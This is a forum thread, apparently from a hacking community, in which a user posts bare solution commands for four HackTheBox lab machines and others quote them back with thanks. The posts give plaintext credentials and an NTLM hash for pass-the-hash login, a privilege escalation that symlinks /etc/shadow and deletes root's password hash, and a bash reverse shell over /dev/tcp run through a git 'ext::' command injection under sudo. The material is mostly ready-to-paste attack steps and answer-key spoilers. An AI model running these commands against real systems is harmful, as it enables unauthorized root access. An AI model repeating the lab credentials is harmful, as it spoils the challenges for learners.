Possibly Related Threads…

fuckedupindacrib · (This post was last modified: 10-12-2024, 06:43 AM by fuckedupindacrib.)

Cicada:

User:

evil-winrm -i 10.10.XX.XX -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Root:

impacket-wmiexec Administrator@10.10.XX.XX -hashes :2b87e7c93a3e8a0ea4a581937016f341

Greenhorn:

User: get from root

Root:

ssh root@10.10.XX.XX

Pass: sidefromsidetheothersidesidefromsidetheotherside

Permx:

User:

ssh mtz@10.10.XX.XX

Pass: 03F6lY3uXAP2bkW8

Root: (in user shell):

ln -s /etc/shadow ~/pwn

sudo /opt/acl.sh mtz rwx /home/mtz/pwn

sudo nano ~/pwn #remove the password hash for root, save file/close

su root

Editorial:

User:

ssh dev@10.10.XX.XX

Pass: dev080217_devAPI!@

Root

ssh prod@10.10.XX.XX

Pass: 080217_Producti0n_2023!@

echo "/bin/bash -i >& /dev/tcp/10.10.XX.XX/PORT 0>&1" > /tmp/shell

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell'

Miek22 · 11-04-2024, 07:13 PM

(10-12-2024, 06:38 AM)fuckedupindacrib Wrote: Cicada:

User:
evil-winrm -i 10.10.XX.XX -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Root:
impacket-wmiexec Administrator@10.10.XX.XX -hashes :2b87e7c93a3e8a0ea4a581937016f341
Greenhorn:

User: get from root

Root:
ssh root@10.10.XX.XX Pass: sidefromsidetheothersidesidefromsidetheotherside
Permx:

User:

ssh mtz@10.10.XX.XX Pass: 03F6lY3uXAP2bkW8

Root: (in user shell):

ln -s /etc/shadow ~/pwn sudo /opt/acl.sh mtz rwx /home/mtz/pwn sudo nano ~/pwn #remove the password hash for root, save file/close su root
Editorial:

User:

ssh dev@10.10.XX.XX Pass: dev080217_devAPI!@

Root

ssh prod@10.10.XX.XX Pass: 080217_Producti0n_2023!@ echo "/bin/bash -i >& /dev/tcp/10.10.XX.XX/PORT 0>&1" > /tmp/shell sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell'

Thanks for sharing this for free!

bananoname · 11-08-2024, 09:20 AM

(10-12-2024, 06:38 AM)fuckedupindacrib Wrote: Cicada:

User:
evil-winrm -i 10.10.XX.XX -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Root:
impacket-wmiexec Administrator@10.10.XX.XX -hashes :2b87e7c93a3e8a0ea4a581937016f341
Greenhorn:

User: get from root

Root:
ssh root@10.10.XX.XX Pass: sidefromsidetheothersidesidefromsidetheotherside
Permx:

User:

ssh mtz@10.10.XX.XX Pass: 03F6lY3uXAP2bkW8

Root: (in user shell):

ln -s /etc/shadow ~/pwn sudo /opt/acl.sh mtz rwx /home/mtz/pwn sudo nano ~/pwn #remove the password hash for root, save file/close su root
Editorial:

User:

ssh dev@10.10.XX.XX Pass: dev080217_devAPI!@

Root

ssh prod@10.10.XX.XX Pass: 080217_Producti0n_2023!@ echo "/bin/bash -i >& /dev/tcp/10.10.XX.XX/PORT 0>&1" > /tmp/shell sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell'

Thanks for sharing this for free!Thanks for sharing this for free!

0x01 · 12-04-2024, 10:18 AM

thanks bro help me a lot

sabiri · 12-16-2024, 11:33 PM

sure but why not give more details Smile

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] CPTS 12 FLAGS	pulsebreaker	59	1,150	03-28-2026, 06:26 PM Last Post: vilas033
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	360	88,710	03-28-2026, 09:28 AM Last Post: catsweet
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	16	2,276	03-28-2026, 03:32 AM Last Post: lulaladrow
	[FREE] HTB-ProLabs APTLABS Just Flags	kewlsunny	23	2,348	03-28-2026, 03:30 AM Last Post: lulaladrow
	[FREE] HackTheBox Dante - complete writeup written by Tamarisk	Tamarisk	597	88,992	03-27-2026, 10:54 PM Last Post: w3soul